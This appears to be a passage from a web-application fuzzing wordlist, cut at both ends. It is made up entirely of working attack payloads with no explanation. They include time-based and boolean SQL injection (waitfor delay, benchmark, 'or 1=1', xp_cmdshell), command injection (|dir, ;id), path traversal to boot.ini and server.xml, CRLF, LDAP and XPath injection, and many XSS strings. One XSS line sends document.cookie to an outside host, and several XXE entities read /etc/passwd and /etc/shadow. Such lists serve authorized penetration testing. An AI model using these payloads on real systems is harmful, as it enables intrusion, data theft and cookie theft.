L)%20waitfor%20delay%20'0:0:20'%20/*\n\",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*\n\"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--\n\nwaitfor delay '0:0:20' /* \n waitfor delay '0:0:20' --\n' waitfor delay '0:0:20' /* \n' waitfor delay '0:0:20' --\n\" waitfor delay '0:0:20' /* \n\" waitfor delay '0:0:20' --\n) waitfor delay '0:0:20' /* \n) waitfor delay '0:0:20' --\n)) waitfor delay '0:0:20' /* \n)) waitfor delay '0:0:20' --\n))) waitfor delay '0:0:20' /* \n))) waitfor delay '0:0:20' --\n)))) waitfor delay '0:0:20' /* \n)))) waitfor delay '0:0:20' --\n))))) waitfor delay '0:0:20' --\n)))))) waitfor delay '0:0:20' --\n') waitfor delay '0:0:20' /* \n') waitfor delay '0:0:20' --\n\") waitfor delay '0:0:20' /* \n\") waitfor delay '0:0:20' --\n')) waitfor delay '0:0:20' /* \n')) waitfor delay '0:0:20' --\n\")) waitfor delay '0:0:20' /* \n\")) waitfor delay '0:0:20' --\n'))) waitfor delay '0:0:20' /* \n'))) waitfor delay '0:0:20' --\n\"))) waitfor delay '0:0:20' /* \n\"))) waitfor delay '0:0:20' --\n')))) waitfor delay '0:0:20' /* \n')))) waitfor delay '0:0:20' --\n\")))) waitfor delay '0:0:20' /* \n\")))) waitfor delay '0:0:20' --\n'))))) waitfor delay '0:0:20' /* \n'))))) waitfor delay '0:0:20' --\n\"))))) waitfor delay '0:0:20' /* \n\"))))) waitfor delay '0:0:20' --\n')))))) waitfor delay '0:0:20' /* \n')))))) waitfor delay '0:0:20' --\n\")))))) waitfor delay '0:0:20' /* \n\")))))) waitfor delay '0:0:20' --\n+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*\n+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--\n+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23\n'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*\n'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--\n'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* \n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* \n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* \n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--\n+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--\n'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--\n\"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23\n,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\n',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\n\",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n\",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n\",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\n),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\n'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\n\"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*\n\"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--\n\"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23\nA\nTRUE\nFALSE\n0\n00\n1\n-1\n1.0\n-1.0\n2\n-2\n-20\n65536\n268435455\n-268435455\n2147483647\n0xfffffff\nNULL\nnull\n\\0\n\\00\n<  script > < / script>\n%0a\n%00\n+%00\n\\0\n\\0\\0\n\\0\\0\\0\n\\00\n\\00\\00\n\\00\\00\\00\n$null\n$NULL\n`dir`\n\\nnetstat -a%\\n\n\\\"blah\n|dir|\n&quot;;id&quot;\ndir%00\ndir%00|\n|dir\n|dir|\n|/bin/ls -al\n?x=\n?x=\"\n?x=|\n?x=>\n/boot.ini\nABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|\n../../boot.ini\n/../../../../../../../../%2A\n%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%\t25%5c..%25%5c..%00\n%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%\t\t25%5c..%25%5c..%255cboot.ini\n/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini\n../../../../../../../../conf/server.xml\nC:/inetpub/wwwroot/global.asa\nC:\\inetpub\\wwwroot\\global.asa\nC:/boot.ini\nC:\\boot.ini\n../../../../../../../../../../../../localstart.asp%00\n../../../../../../../../../../../../localstart.asp\n../../../../../../../../../../../../boot.ini%00\n../../../../../../../../../../../../boot.ini\n/./././././././././././boot.ini\n/../../../../../../../../../../../boot.ini%00\n/../../../../../../../../../../../boot.ini\n/..\\../..\\../..\\../..\\../..\\../..\\../boot.ini\n/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./boot.ini\n\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini%00\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\n/../../../../../../../../../../../boot.ini%00.html\n/../../../../../../../../../../../boot.ini%00.jpg\n/.../.../.../.../.../\n..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini\n/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini\n%0d%0aX-Injection-Header:%20AttackValue\n!@#0%^#0##018387@#0^^**(()\n%01%02%03%04%0a%0d%0aADSF\n/,%ENV,/\n&lt;!--#exec%20cmd=&quot;dir&quot;--&gt;\n&lt;!--#exec%20cmd=&quot;dir&quot;--&gt;\n%\n#\n*\n}\n;\n/\n\\\n\\\\\n\\\\/\n\\\\\\\\*\n\\\\\\\\?\\\\\n&lt\n&lt;\n&LT\n&LT;\n<\n<<\n<<<\n|\n||\n`\n-\n--\n*|\n^'\n\\'\n/'\n@'\n(')\n{'}\n[']\n*'\n#'\n!'\n!@#$%%^#$%#$@#$%$$@#$%^^**(()\n%01%02%03%04%0a%0d%0aADSF\n\\t\n\"\\t\"\n&#10;\n&#13;\n&#10;&#13;\n&#13;&#10;\n#xD\n#xA\n#xD#xA\n#xA#xD\n/%00/\n%00/\n%00\n<?\n%3C\n%3C%3F\n%60\n%5C\n%5C/\n%7C\n%00\n/%2A\n%2A\n%2C\n%20\n%20|\n%250a\n%2500\n../\n%2e%2e%2f\n..%u2215\n..%c0%af\n..%bg%qf\n..\\\n..%5c\n..%%35c\n..%255c\n..%%35%63\n..%25%35%63\n..%u2216\n&#60\n&#060\n&#0060\n&#00060\n&#000060\n&#0000060\n&#60;\n&#060;\n&#0060;\n&#00060;\n&#000060;\n&#0000060;\n&#x3c\n&#x03c\n&#x003c\n&#x0003c\n&#x00003c\n&#x000003c\n&#x3c;\n&#x03c;\n&#x003c;\n&#x0003c;\n&#x00003c;\n&#x000003c;\n&#X3c\n&#X03c\n&#X003c\n&#X0003c\n&#X00003c\n&#X000003c\n&#X3c;\n&#X03c;\n&#X003c;\n&#X0003c;\n&#X00003c;\n&#X000003c;\n&#x3C\n&#x03C\n&#x003C\n&#x0003C\n&#x00003C\n&#x000003C\n&#x3C;\n&#x03C;\n&#x003C;\n&#x0003C;\n&#x00003C;\n&#x000003C;\n&#X3C\n&#X03C\n&#X003C\n&#X0003C\n&#X00003C\n&#X000003C\n&#X3C;\n&#X03C;\n&#X003C;\n&#X0003C;\n&#X00003C;\n&#X000003C;\n\\x3c\n\\x3C\n\\u003c\n\\u003C\nsomething%00html\n&apos;\n/&apos;\n\\&apos;\n^&apos;\n@&apos;\n{&apos;}\n[&apos;]\n*&apos;\n#&apos;\n\">xxx<P>yyy\n\"><script>\"\n<script>alert(\"XSS\")</script>\n<<script>alert(\"XSS\");//<</script>\n<script>alert(document.cookie)</script>\n'><script>alert(document.cookie)</script>\n'><script>alert(document.cookie);</script>\n\\\";alert('XSS');//\n%3cscript%3ealert(\"XSS\");%3c/script%3e\n%3cscript%3ealert(document.cookie);%3c%2fscript%3e\n%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E\n&ltscript&gtalert(document.cookie);</script>\n&ltscript&gtalert(document.cookie);&ltscript&gtalert\n<xss><script>alert('XSS')</script></vulnerable>\n<IMG%20SRC='javascript:alert(document.cookie)'>\n<IMG SRC=\"javascript:alert('XSS');\">\n<IMG SRC=\"javascript:alert('XSS')\"\n<IMG SRC=javascript:alert('XSS')>\n<IMG SRC=JaVaScRiPt:alert('XSS')>\n<IMG SRC=javascript:alert(&quot;XSS&quot;)>\n<IMG SRC=`javascript:alert(\"'XSS'\")`>\n<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\n<IMG%20SRC='javasc\tript:alert(document.cookie)'>\n<IMG SRC=\"jav\tascript:alert('XSS');\">\n<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\n<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n<IMG DYNSRC=\"javascript:alert('XSS')\">\n<IMG LOWSRC=\"javascript:alert('XSS')\">\n<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>\n<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E\n\"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>\n%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E\n';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}\n'';!--\"<XSS>=&{()}\n\n'\n\"\n#\n-\n--\n' --\n--';\n' ;\n= '\n= ;\n= --\n\\x23\n\\x27\n\\x3D \\x3B'\n\\x3D \\x27\n\\x27\\x4F\\x52 SELECT *\n\\x27\\x6F\\x72 SELECT *\n'or select *\nadmin'--\n';shutdown--\n<>\"'%;)(&+\n' or ''='\n' or 'x'='x\n\" or \"x\"=\"x\n') or ('x'='x\n0 or 1=1\n' or 0=0 --\n\" or 0=0 --\nor 0=0 --\n' or 0=0 #\n\" or 0=0 #\nor 0=0 #\n' or 1=1--\n\" or 1=1--\n' or '1'='1'--\n\"' or 1 --'\"\nor 1=1--\nor%201=1\nor%201=1 --\n' or 1=1 or ''='\n\" or 1=1 or \"\"=\"\n' or a=a--\n\" or \"a\"=\"a\n') or ('a'='a\n\") or (\"a\"=\"a\nhi\" or \"a\"=\"a\nhi\" or 1=1 --\nhi' or 1=1 --\nhi' or 'a'='a\nhi') or ('a'='a\nhi\") or (\"a\"=\"a\n'hi' or 'x'='x';\n@variable\n,@variable\nPRINT\nPRINT @@variable\nselect\ninsert\nas\nor\nprocedure\nlimit\norder by\nasc\ndesc\ndelete\nupdate\ndistinct\nhaving\ntruncate\nreplace\nlike\nhandler\nbfilename\n' or username like '%\n' or uname like '%\n' or userid like '%\n' or uid like '%\n' or user like '%\nexec xp\nexec sp\n'; exec master..xp_cmdshell\n'; exec xp_regread\nt'exec master..xp_cmdshell 'nslookup www.google.com'--\n--sp_password\n\\x27UNION SELECT\n' UNION SELECT\n' UNION ALL SELECT\n' or (EXISTS)\n' (select top 1\n'||UTL_HTTP.REQUEST\n1;SELECT%20*\nto_timestamp_tz\ntz_offset\n&lt;&gt;&quot;'%;)(&amp;+\n'%20or%201=1\n%27%20or%201=1\n%20$(sleep%2050)\n%20'sleep%2050'\nchar%4039%41%2b%40SELECT\n&apos;%20OR\n'sqlattempt1\n(sqlattempt2)\n|\n%7C\n*|\n%2A%7C\n*(|(mail=*))\n%2A%28%7C%28mail%3D%2A%29%29\n*(|(objectclass=*))\n%2A%28%7C%28objectclass%3D%2A%29%29\n(\n%28\n)\n%29\n&\n%26\n!\n%21\n' or 1=1 or ''='\n' or ''='\nx' or 1=1 or 'x'='y\n/\n//\n//*\n*/*\n@*\ncount(/child::node())\nx' or name()='username' or 'x'='y\n<name>','')); phpinfo(); exit;/*</name>\n<![CDATA[<script>var n=0;while(true){n++;}</script>]]>\n<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file://c:/boot.ini\">]><foo>&xxe;</foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////etc/passwd\">]><foo>&xxe;</foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////etc/shadow\">]><foo>&xxe;</foo>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////dev/random\">]><foo>&xxe;</foo>\n<xml ID=I><X><C><![CDATA[<IMG 